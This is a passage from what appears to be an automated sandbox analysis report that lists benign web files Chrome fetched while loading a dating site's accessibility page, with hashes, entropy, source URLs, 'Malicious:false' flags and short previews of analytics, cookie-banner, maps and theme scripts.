                                                                                                                                                                                                                                                                                Preview:(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[2775],{154229:c=>{c.exports={}},273549:c=>{c.exports={}},801563:c=>{c.exports={}},896766:c=>{c.exports={}},801579:(c,e,t)=>{"use strict";var n=t(875832);Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0;var u=n(t(987195)),s=n(t(845076)),a=n(t(174161)),m=t(647871);t(154229);var i=f=>{var r=f.checked,v=f.onChange,A=f.inputProps,d=()=>{v(!r)};return a.default.createElement("div",{className:"toggle-wrapper"},a.default.createElement("p",{"aria-hidden":"true"},r?(0,m.t)("On",null,{project:"gdpr-cookie-banner",notes:"A toggle is on"}):(0,m.t)("Off",null,{project:"gdpr-cookie-banner",notes:"A toggle is off"})),a.default.createElement("label",{className:(0,s.default)("sqs-toggle",{checked:r,"sqs-toggle--on":r,"sqs-toggle--off":!r})},a.default.createElement("input",(0,u.default)({type:"checkbox",checked:r,onChange:d},A))))},E=e.default=i;c.exports=e.default},932138:(c,e)=>{"use strict";Object.defineProperty(e,
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:gzip compressed data, from Unix, original size modulo 2^32 43386
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):12103
                                                                                                                                                                                                                                                                                Entropy (8bit):7.985508379818304
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:26MV2PEUWRRI2V6SKbQ5W3YmOCf3OrXT9WVc2VhjIJ0STPz03aWagq692yvggkbH:+tjRIm6SoITu3khUTPjI5TI3afb6YmwH
                                                                                                                                                                                                                                                                                MD5:BED9B675380C07EDC84C03D0F362B192
                                                                                                                                                                                                                                                                                SHA1:0FC4DCF8CB37F303985159B5A9348BB9AE5C6397
                                                                                                                                                                                                                                                                                SHA-256:3AE25E7FC8C3E9A41A480D9E39BA0E43845FFD78B0529695530925F6575852D9
                                                                                                                                                                                                                                                                                SHA-512:25CFA4027E02D6EEFC95202417A02843556BDA5D28685735FFC102F3C63327CFAAF59B9565E3B23F2BC26C0274EFDD0F69CCA8AD9A3A6DCEA4D903722DCE9FB6
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:...........;ks.....n..i....k\....<.L..J..P"$F.q....{.%....;;.6.B.}N.w.>.....I.0(E*F.J..t$T=4......yc....J...T.4..%......."\..F......d..%...U52..c+>F..f..JV...... ......."tW>..[.x....L.Q.P.u't..\]wF..w=.._.z....Boi...'.c.FIl<m6M..]u.;..K....F..'.Y.R........AK.M..3.c.N.....D....yf..&...Y2oz......uS..Q.j.]&$...8[.i..6cT..L5.....#..Q.&hj;I.=6I.L.^,F..v;z\&...S4.....N.h...|.].@..D..B.=a..pz.P.....e.5...vQ....G~.fK...2..A.r9ko...ihO...R...[-...}.=.T.39O!.3"....(.....C.....q...8.E..6..*.}..]t.D...'gN.;.2.>....k.+.S)D.....0...".Q.i.,./r.(....Nn.Tmhz.m.Kx]Zj....y.<...;.D.r..H...U....@%.Kb...W.V.{..`i......._...'.!)5.CGd.....e.+^...E.8.Q..d.....4.#...|_.7.UCm..I{.{.f['...`..c:mBjMp......N..F..1.>*. YR...N....~te.B.}n....M..q.<...x.....N:.6.....CT..+^.1........!;...8....P..d+>.q",3..qW.....qb....:....C@ey.$..c.D.e..D...-..<...!......$.d...I`sj.;yplf.....<Y.2I.y.L.Du1".K..... gWn.4.2.....l..0ri....I...Q......X.x.}.?.......A.I..).g.a4.....o..-c
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):3221
                                                                                                                                                                                                                                                                                Entropy (8bit):4.968390870827016
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:eJY/EPgJA//DMlsH+dMjzdyhpKturHpg8gPVNDabOTWD0c:koEPgJATmsrTt4MVN3TBc
                                                                                                                                                                                                                                                                                MD5:3FDE640BEFFACA6853692C3A8399837F
                                                                                                                                                                                                                                                                                SHA1:B0E920EB8B0E05ABAA32C921F14FAF0D9437C8AE
                                                                                                                                                                                                                                                                                SHA-256:5A55D3DE0A725A8D09AB29A42AC534238742C459937D09D199E279EDDEEF74CA
                                                                                                                                                                                                                                                                                SHA-512:55E6A3B1F7736D01B498372716D12EB3FDC0B1DE6500B17F61A5A56C7A32F9C6F6E525C28F8CE3B72AB8537E9002FA6A6C308F43EE7F29FA65E1E44C9E719A7E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/*jshint browser:true */./*!.* FitVids 1.1.*.* Copyright 2013, Chris Coyier - http://css-tricks.com + Dave Rupert - http://daverupert.com.* Credit to Thierry Koblentz - http://www.alistapart.com/articles/creating-intrinsic-ratios-for-video/.* Released under the WTFPL license - http://sam.zoy.org/wtfpl/.*.*/..;(function( $ ){.. 'use strict';.. $.fn.fitVids = function( options ) {. var settings = {. customSelector: null,. ignore: null. };.. if(!document.getElementById('fit-vids-style')) {. // appendStyles: https://github.com/toddmotto/fluidvids/blob/master/dist/fluidvids.js. var head = document.head || document.getElementsByTagName('head')[0];. var css = '.fluid-width-video-wrapper{width:100%;position:relative;padding:0;}.fluid-width-video-wrapper iframe,.fluid-width-video-wrapper object,.fluid-width-video-wrapper embed {position:absolute;top:0;left:0;width:100%;height:100%;}';. var div = document.createElement("div");. div.innerHTML = '<p>x<
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2664), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):2664
                                                                                                                                                                                                                                                                                Entropy (8bit):5.553216719810201
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:nUlwXlOmUJ2DqHiwQoatgE8p2om4wZFCm3+tzah5IEuNJRB4SNWcGDPA:nUlwXlhe08idDtgE8hm4kxOtH/JRhl4I
                                                                                                                                                                                                                                                                                MD5:EB5D2A48F91C6859D34902FAE234EE8D
                                                                                                                                                                                                                                                                                SHA1:19C7E97AF7F647813A526535BDEEF0412AA5EC52
                                                                                                                                                                                                                                                                                SHA-256:D204E1E126A03A9F4534CB062AB17590CC88F2A532C0DD38259BA9E838EB68D4
                                                                                                                                                                                                                                                                                SHA-512:FF83CE7E9F017BD48085E351C8274EDDA27AE807F10198F770B29C6329D70A158B03B20BDDE85933F0610697D5BE4B1C5EC0AFD4DADEB226F14C8E10401E31B0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://trc.taboola.com/1121901/trc/3/json?tim=1728225782020&data=%7B%22id%22%3A276%2C%22ii%22%3A%22%2Fen%2Flegal-en%2Four-commitment-to-accessibility%22%2C%22it%22%3A%22video%22%2C%22sd%22%3Anull%2C%22ui%22%3Anull%2C%22vi%22%3A1728225782001%2C%22cv%22%3A%2220241006-3-RELEASE%22%2C%22uiv%22%3A%22default%22%2C%22u%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22e%22%3Anull%2C%22cb%22%3A%22TFASC.trkCallback%22%2C%22qs%22%3A%22%22%2C%22r%22%3A%5B%7B%22li%22%3A%22rbox-tracking%22%2C%22s%22%3A0%2C%22uim%22%3A%22rbox-tracking%3Apub%3Dsparkscusen%3Aabp%3D0%22%2C%22uip%22%3A%22rbox-tracking%22%2C%22orig_uip%22%3A%22rbox-tracking%22%7D%5D%2C%22mpvd%22%3A%7B%22en%22%3A%22page_view%22%2C%22tim%22%3A1728225782019%2C%22ref%22%3Anull%2C%22item-url%22%3A%22https%3A%2F%2Fabout.christianmingle.com%2Fen%2Flegal-en%2Four-commitment-to-accessibility%2F%22%2C%22tos%22%3A3%2C%22ssd%22%3A1%2C%22scd%22%3A0%2C%22it%22%3A%22JS_PIXEL%22%2C%22supv%22%3Atrue%7D%2C%22pa%22%3A%7B%22su%22%3Atrue%7D%2C%22psb%22%3Atrue%7D&pubit=i
                                                                                                                                                                                                                                                                                Preview:TFASC.trkCallback({"trc":{"si":"95d424a7f83a001251dc2189306c7903","sd":"v2_95d424a7f83a001251dc2189306c7903_b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779_1728225785_1728225785_CNawjgYQ7bxEGPHRopKmMiABKAEw4QE4kaQOQNWmD0jZiNcDUPUDWABgAGiQgI6I5eeGxhBwAYABAA","ui":"b94bfb63-f96a-4438-a07a-81f9d8e258f1-tuctdfc2779","plc":"DESK","wi":"7469561950141635588","cc":"US","route":"US:CH:V","el2r":["bulk-metrics","debug","social","abtests","metrics","perf","supply-feature"],"uvpw":"1","pi":"1121901","cpb":"EhIyMDI0MTAwNi0zLVJFTEVBU0UYASCc__________8BKhljaC50YWJvb2xhc3luZGljYXRpb24uY29tMg90cmMtdHJhY2tpbmc4MTE4gPa5QUCRpA5I1aYPUNmI1wNY9QNjCMNvEL2PARgyZGMI3v__________ARDe__________8BGCJkYwjXFhDVHxgjZGMI4k8QnWoYNmRjCNIDEOAGGAhkYwiWFBCaHBgYZGMI7wMQiQcYCWRjCJZYEJZ0GAtkYwieaBCzlwEYPWRjCPQUEJ4dGB9kYwikJxCDNRgvZHgBgAHiI4gBy5mQ0gGQARiYAc3popKmMtsBEAHcAQ","evh":"-1731850526","evi":{"50":"14275|18365","61":"13342|19379","47":"5028|6787"},"vl":[{"ri":"451f241b748dade9246b3d4526ac359b","uip":"rbox-tracking","pp
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):149805
                                                                                                                                                                                                                                                                                Entropy (8bit):5.6004134683803555
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Cnxj4bndhXdOU0tNo455wjdrm/bK+OTRMWMrvBDJTcitj+wf2EAeiPWMWNZVgdyo:Cnxj479OU03o4PwjhIBVT39ROyuvb
                                                                                                                                                                                                                                                                                MD5:5693E74A87CDFE0DD8CF9E97ABC2EC67
                                                                                                                                                                                                                                                                                SHA1:0912A92CEBFC4248B4D561F57B32D18135F9AD59
                                                                                                                                                                                                                                                                                SHA-256:79951B5BD4D729A2B2F4D380819F2C14BBCF26F21DB56A520189633467766CF4
                                                                                                                                                                                                                                                                                SHA-512:B0954FF6229C037AAEC67F6CC91889D3AD1C0D38AC3E53E61F3A98D49379FA43C1FF709C7017459B9BD416BCEB2236D90B24C17E072882C122360069DCD9E0E0
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://analytics.tiktok.com/i18n/pixel/static/identify_7bf75739.js
                                                                                                                                                                                                                                                                                Preview:!function(){"use strict";function t(){t=function(){return e};var e={},d=Object.prototype,n=d.hasOwnProperty,r="function"==typeof Symbol?Symbol:{},o=r.iterator||"@@iterator",i=r.asyncIterator||"@@asyncIterator",a=r.toStringTag||"@@toStringTag";function $(t,e,d){return Object.defineProperty(t,e,{value:d,enumerable:!0,configurable:!0,writable:!0}),t[e]}try{$({},"")}catch(t){$=function(t,e,d){return t[e]=d}}function u(t,e,d,n){var r=e&&e.prototype instanceof s?e:s,o=Object.create(r.prototype),i=new w(n||[]);return o._invoke=function(t,e,d){var n="suspendedStart";return function(r,o){if("executing"===n)throw new Error("Generator is already running");if("completed"===n){if("throw"===r)throw o;return E()}for(d.method=r,d.arg=o;;){var i=d.delegate;if(i){var a=_(i,d);if(a){if(a===c)continue;return a}}if("next"===d.method)d.sent=d._sent=d.arg;else if("throw"===d.method){if("suspendedStart"===n)throw n="completed",d.arg;d.dispatchException(d.arg)}else"return"===d.method&&d.abrupt("return",d.arg);
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65455)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):377545
                                                                                                                                                                                                                                                                                Entropy (8bit):5.335225016348627
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:bwx8MJ98+IxnDBIUtRQP6/FJPTwa6IOatr:4Ixn1h
                                                                                                                                                                                                                                                                                MD5:4B732508F22F3022356407B9457E4C86
                                                                                                                                                                                                                                                                                SHA1:91216C391F265871AB932330FF541E8B22C19A74
                                                                                                                                                                                                                                                                                SHA-256:E7C129EE5DE51A2692632D98E0E18CBC092FB758635921E4ECC404293495FAFA
                                                                                                                                                                                                                                                                                SHA-512:DCD7DC3D18871C3F6B102150F84B8707EDF1D201300C8CD134BF95C9DE8859BCF935F89A1B44C0FFA0AA2775EC8A491D76A192B19B2576A4C65117F57F641AD8
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:/** . * onetrust-banner-sdk. * v6.14.0. * by OneTrust LLC. * Copyright 2021 . */.!function(){"use strict";var o=function(e,t){return(o=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var o in t)t.hasOwnProperty(o)&&(e[o]=t[o])})(e,t)};var i,e,r=function(){return(r=Object.assign||function(e){for(var t,o=1,n=arguments.length;o<n;o++)for(var r in t=arguments[o])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e}).apply(this,arguments)};function a(s,i,l,a){return new(l=l||Promise)(function(e,t){function o(e){try{r(a.next(e))}catch(e){t(e)}}function n(e){try{r(a.throw(e))}catch(e){t(e)}}function r(t){t.done?e(t.value):new l(function(e){e(t.value)}).then(o,n)}r((a=a.apply(s,i||[])).next())})}function d(o,n){var r,s,i,e,l={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return e={next:t(0),throw:t(1),return:t(2)},"function"==typeof Symbol&&(e[Symbol.iterator]=function(){return this}),e;function t(t){
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                Entropy (8bit):3.577819531114783
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:3:HAOfaY:gOfaY
                                                                                                                                                                                                                                                                                MD5:4C8A26E14EDABDD7D6BFBF1472AFC853
                                                                                                                                                                                                                                                                                SHA1:F268C3DB54608F753ED9320CB2411B00A40C8D65
                                                                                                                                                                                                                                                                                SHA-256:B9224CA870B658AB694ECED1FBB07A971FCE7D0C990E50046929E9968BAF435C
                                                                                                                                                                                                                                                                                SHA-512:820B85A739953E8A71E89FEB45BBFB01E2D2F8977D30B0AB11BED28A7CA2B0365595AA7074A3A9780C8DE95E0C8DE839B5C390519F5238E8435F44736CDD497F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAmsaixwqq-OlxIFDaWTNiQ=?alt=proto
                                                                                                                                                                                                                                                                                Preview:CgkKBw2lkzYkGgA=
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (657), with no line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):657
                                                                                                                                                                                                                                                                                Entropy (8bit):4.9001162582550135
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12:Vl0CYeiPIXGMAouXT5gmfljafG493sXD6Gg1ArmvfDydzWIGY1XhKUvfaABom5jw:VaCYdPIXAXNffljafG493sXlg1AifDyS
                                                                                                                                                                                                                                                                                MD5:62BE494BE608AE726446870FCAD2CF54
                                                                                                                                                                                                                                                                                SHA1:EB94F7A71809D965C80752B5CED318110241E48D
                                                                                                                                                                                                                                                                                SHA-256:D8F80572E7C35669682F6D11F729668A401409997AA2ECDEDD7C1896E4C9B4F5
                                                                                                                                                                                                                                                                                SHA-512:1CA8C61C4A1D1735CD60DA51B54CD4F6A930C39E4587718E8B8E21DF53FAC4A014C6D9B0E926934E599E96B7879CD37B790545DF4DEEDF6645538980391C648E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:!function(t,i){"use strict";i.utilites.namespace("post_formats"),i.post_formats={init:function(){var t=this;i.status.document_ready?t.render(t):i.variable.$document.on("ready",t.render(t))},render:function(t){t.initalize("slider"),t.initalize("popup")},initalize:function(i){t(window).load(function(){t("*[data-cherry"+i+'="1"]').each(function(){var n=t(this).data(i),e=t(this).data("init");return t(this).data("initalized",!1),t(this).trigger({type:"cherry-post-formats-custom-init",item:t(this),object:i}),!0===t(this).data("initalized")?1:n?t.isFunction(jQuery.fn[n])?(t(this)[n](e),void 0):!1:!1})})}},i.post_formats.init()}(jQuery,window.CherryJsCore);
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (577)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):300905
                                                                                                                                                                                                                                                                                Entropy (8bit):5.482945781545427
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:KVIvj27tfrDxyExsO40FyYZNgYCsGsRt0lcvm4N8W3VrQqDW+/fMheYULy/:KVIvj27drDxyExs50FyYEYYlcvm4Nt3U
                                                                                                                                                                                                                                                                                MD5:B0E91380D8D1FE01441DF47457D93211
                                                                                                                                                                                                                                                                                SHA1:F2E55BA7F64CE135DE25CEB1CA6B723DAC4D938B
                                                                                                                                                                                                                                                                                SHA-256:22D7B487C7ED16B6DB70AE6AAD638E15244B54CDF550AD8F0ADD612FCF1B1C69
                                                                                                                                                                                                                                                                                SHA-512:5F86A8634DB341D866BDA45EF127B00EDF696B5E2428BFB9EECCD64938202DC1DDE6CEB1505F057928AA828D0F528B88D15F49E65DD79DBDA658154F57A4FC4F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://maps-api-ssl.google.com/maps-api-v3/api/js/57/13/common.js
                                                                                                                                                                                                                                                                                Preview:google.maps.__gjsload__('common', function(_){var ega,fga,gga,hga,iga,jga,kga,lga,mga,nga,oga,qga,gr,sga,tga,mr,nr,vga,rr,tr,wr,wga,xga,yga,zga,Aga,Rr,Cga,Dga,Ega,Fga,Ur,Wr,Xr,Iga,Lga,Nga,bs,ds,Pga,Rga,Sga,Tga,Xga,Is,$ga,cha,fha,Ws,hha,gha,kt,lt,kha,nt,lha,mha,nha,oha,pha,qha,rha,sha,wha,xha,Aha,vt,Bha,wt,Cha,xt,Dha,yt,Bt,Dt,Fha,Iha,Jha,Lha,Pha,Qha,Kha,Rha,Tha,Uha,bu,Wha,Yha,$ha,mu,dia,Su,mia,oia,nia,sia,uia,xia,yia,zia,Aia,Bv,Hv,Fia,Iv,Lv,Gia,Mv,Hia,Pv,Tv,Nia,Oia,Qia,Sia,Ria,Uia,Tia,Pia,Via,cw,Zia,$ia,aja,hw,bja,Ija,Mja,Oja,Qja,dka,ry,Cka,Gka,.Eka,Jka,Nka,Oka,Wka,Xka,Yka,Zka,Ry,Sy,bla,cla,dla,ela,Ty,Hr,Gr,Mga,lr,uga,as,$r,Zr,Hga,Jga,Vy,Oga,Qga,Lx,Mx,gla,Nja,Kx,Nx,Uga,Vga,Rja,Wga,aha,Zy,hla,az,bz,ila,jla,lla,dz,mla,nla,fz,gz,ola,pla,iz,qla,jz,rla,sla,mz,tla,oz,ula,vla,qz,wla,xla,sz,tz,uz,vz,yla,zla,Ala,tha,vha,Fla,Gla,Hla,Ila,Jla,zz,Bx,Mla,Nla,Ola,Pla,Nha,Jt,Qla,jka,Bka,uka,Zt,aia,gu,Rla;_.dr=function(a,b){return _.aa[a]=b};ega=function(a,b){return _.vd(b)};fga=function(a){return a};gg
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1530
                                                                                                                                                                                                                                                                                Entropy (8bit):4.9444324660296175
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:1UjCd4EzRHfDdadpp47pXHKpa7WhJlMarDjCd4EzRHCadpp47pXHKpa7WhJlMS:1aEz1DEKMywyar1EztKMywyS
                                                                                                                                                                                                                                                                                MD5:95BD9B340AD6826BEFF005E5DF32BD77
                                                                                                                                                                                                                                                                                SHA1:FDB64D88E53C9279EA62B5ACBCF86641C52D63F2
                                                                                                                                                                                                                                                                                SHA-256:F2C809F77B19DF64EC8270272AC29CE3D84D242A663E589825A9E4F57B8A5461
                                                                                                                                                                                                                                                                                SHA-512:FAA3DFDE6D5938457B56B501C6028F0E7320225059538ECECC345D7C7C651E687F768C78BE84D8676313FD9F5B56DC663F44C9B7083A3262F031E231402796C5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-form-move-tracker.js?ver=1.16.2
                                                                                                                                                                                                                                                                                Preview:document.addEventListener("focusin", function(event) {...const elem = event && event.target && event.target.closest && event.target.closest("input,select,textarea,button,meter,progress");...if ( elem ) {....window[ gtm4wp_datalayer_name ].push({.....'event' : 'gtm4wp.formElementEnter',.......'inputID' : elem.getAttribute("id") || "(no input ID)",.....'inputName' : elem.getAttribute("name") || "(no input name)",.....'inputClass': elem.getAttribute("class") || "(no input class)",.......'formID' : (elem.form && elem.form.getAttribute("id")) || "(no form ID)",.....'formName' : (elem.form && elem.form.getAttribute("name")) || "(no form name)",.....'formClass': (elem.form && elem.form.getAttribute("class")) || "(no form class)"....});...}..}, false);....document.addEventListener("focusout", function(event) {...const elem = event && event.target && event.target.closest && event.target.closest("input,select,textarea,button,meter,progress");...if ( elem ) {....window[ gtm4wp_datalayer_na
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (451), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):451
                                                                                                                                                                                                                                                                                Entropy (8bit):5.175708776160106
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6:+hjcxClKXxjcxClKXlrqQOjJ4EOrB2QTKkhpFvwG2PiqyERIWiW1t1NvRLlydi+C:+dcxCWcxC0qQOjQd9udy2IiVlydiF
                                                                                                                                                                                                                                                                                MD5:4D6A40A696D1ABBDF25CD121AA88B10E
                                                                                                                                                                                                                                                                                SHA1:F6288297D9CD2BD6FB5024E8B116B83C0C2050BE
                                                                                                                                                                                                                                                                                SHA-256:A61DDD7C4DB00FA694A870C95E1D2AFA9FA3BF7034D92C8F68A341FC21EDB053
                                                                                                                                                                                                                                                                                SHA-512:113E5513D9BB75093DDC37D801C561D092F9DF76F6DC7DFECA38FF74435D4FE796A569DF62800E7BE87873A446E313D90A6142AEF6F93D4B50C6FFC51696308C
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/scripts/floating-cart.11c2f1b3c1cb2ba0d418.js
                                                                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunknew_bedford_framework=self.webpackChunknew_bedford_framework||[]).push([[9528],{96418:function(e,n,t){t.r(n);var a=t(59440),o=t(16024);n.default=function(e){(0,o.A)().then((function(){var n=(0,a.T)(window,"Y.Squarespace.Singletons.ShoppingCart",null);n&&(n.on("item-added",(function(n){e.classList.remove("hidden")})),n.after("load",(function(n){n.target.get("totalQuantity")>0&&e.classList.remove("hidden")})))}))}}}]);
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:CSV text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):83617
                                                                                                                                                                                                                                                                                Entropy (8bit):5.031288361913534
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:Jgei6eD8NTv11MY+lWMDF+0VYJ1X5jTpPgq7Xyeys8Fcr+:J/LeA1MNDAJ1X5XpPgq7XyeJ+
                                                                                                                                                                                                                                                                                MD5:608B0CC0974DAA19271E81D520792EB1
                                                                                                                                                                                                                                                                                SHA1:6A3B0D38CAFB5C7544D6D921DB6FF14DAD237759
                                                                                                                                                                                                                                                                                SHA-256:AA3EAC33D5E68B70F611CDF2FDC172EC5EA909C4269CB18C65C0D667658E886C
                                                                                                                                                                                                                                                                                SHA-512:E45EE74B21FE8A932DF9220EED0B7A8843B8585A88A3EBB4F0C73B845F9D6254D1BF72489D9D01424779122B393ABDDCA135E41496E11BB247D0CF61D7D7E637
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:var $tm_pb_slider = jQuery( '.tm_pb_slider' ),..$tm_pb_tabs = jQuery( '.tm_pb_tabs' ),..$tm_pb_tabs_li = $tm_pb_tabs.find( '.tm_pb_tabs_controls li' ),..$tm_pb_video_section = jQuery('.tm_pb_section_video_bg'),..$tm_pb_newsletter_button = jQuery( '.tm_pb_newsletter_button' ),..$tm_pb_filterable_portfolio = jQuery( '.tm_pb_filterable_portfolio' ),..$tm_pb_fullwidth_portfolio = jQuery( '.tm_pb_fullwidth_portfolio' ),..$tm_pb_gallery = jQuery( '.tm_pb_gallery' ),..$tm_pb_countdown_timer = jQuery( '.tm_pb_countdown_timer' ),..$tm_post_gallery = jQuery( '.tm_post_gallery' ),..$tm_lightbox_image = jQuery( '.tm_pb_lightbox_image'),..$tm_pb_map = jQuery( '.tm_pb_map_container' ),..$tm_pb_circle_counter = jQuery( '.tm_pb_circle_counter_bar' ),..$tm_pb_number_counter = jQuery( '.tm_pb_number_counter' ),..$tm_pb_parallax = jQuery( '.tm_parallax_bg' ),..$tm_pb_shop = jQuery( '.tm_pb_shop' ),..$tm_pb_post_fullwidth = jQuery( '.single.tm_pb_pagebuilder_layout.tm_full_width_page' ),..tm_is_mob
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2224
                                                                                                                                                                                                                                                                                Entropy (8bit):4.495676169349362
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:p+aFUyHT42gwFmbwWA5Lv5c6ozyH2sb0WaENAeTqrKc11stt3:pnFUyHawsqVv5CzyW0aKNWKEOp
                                                                                                                                                                                                                                                                                MD5:06017FE3F68A46BBB80A645746261330
                                                                                                                                                                                                                                                                                SHA1:0948B6722519DD2FAF03810470D66D99C421563D
                                                                                                                                                                                                                                                                                SHA-256:3E142ED154956C1787255090A0731BFC9EB07B836122F8529938E8EB578BDA46
                                                                                                                                                                                                                                                                                SHA-512:ACD2CA56F0D2EC5113E2BB733F0C4C5916D8AD2EB0204895918BBDD3C005E0B6BD2332FF2390E3BEDAC78C653AE21ACC6BE5702238243156E2F6985FC02DA57A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:var tm_hash_module_seperator = '||',. tm_hash_module_param_seperator = '|';..function process_tm_hashchange( hash ) {. if ( ( hash.indexOf( tm_hash_module_seperator, 0 ) ) !== -1 ) {. modules = hash.split( tm_hash_module_seperator );. for ( var i = 0; i < modules.length; i++ ) {. var module_params = modules[i].split( tm_hash_module_param_seperator );. var element = module_params[0];. module_params.shift();. if ( $('#' + element ).length ) {. $('#' + element ).trigger({. type: "tm_hashchange",. params: module_params. });. }. }. } else {. module_params = hash.split( tm_hash_module_param_seperator );. var element = module_params[0];. module_params.shift();. if ( $('#' + element ).length ) {. $('#' + element ).trigger({. type: "tm_hashchange",. params: module_params. });. }. }.}..function tm_set_hash( module_state_hash ) {. module_id = module_state_hash.split( tm_hash_module_param_
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
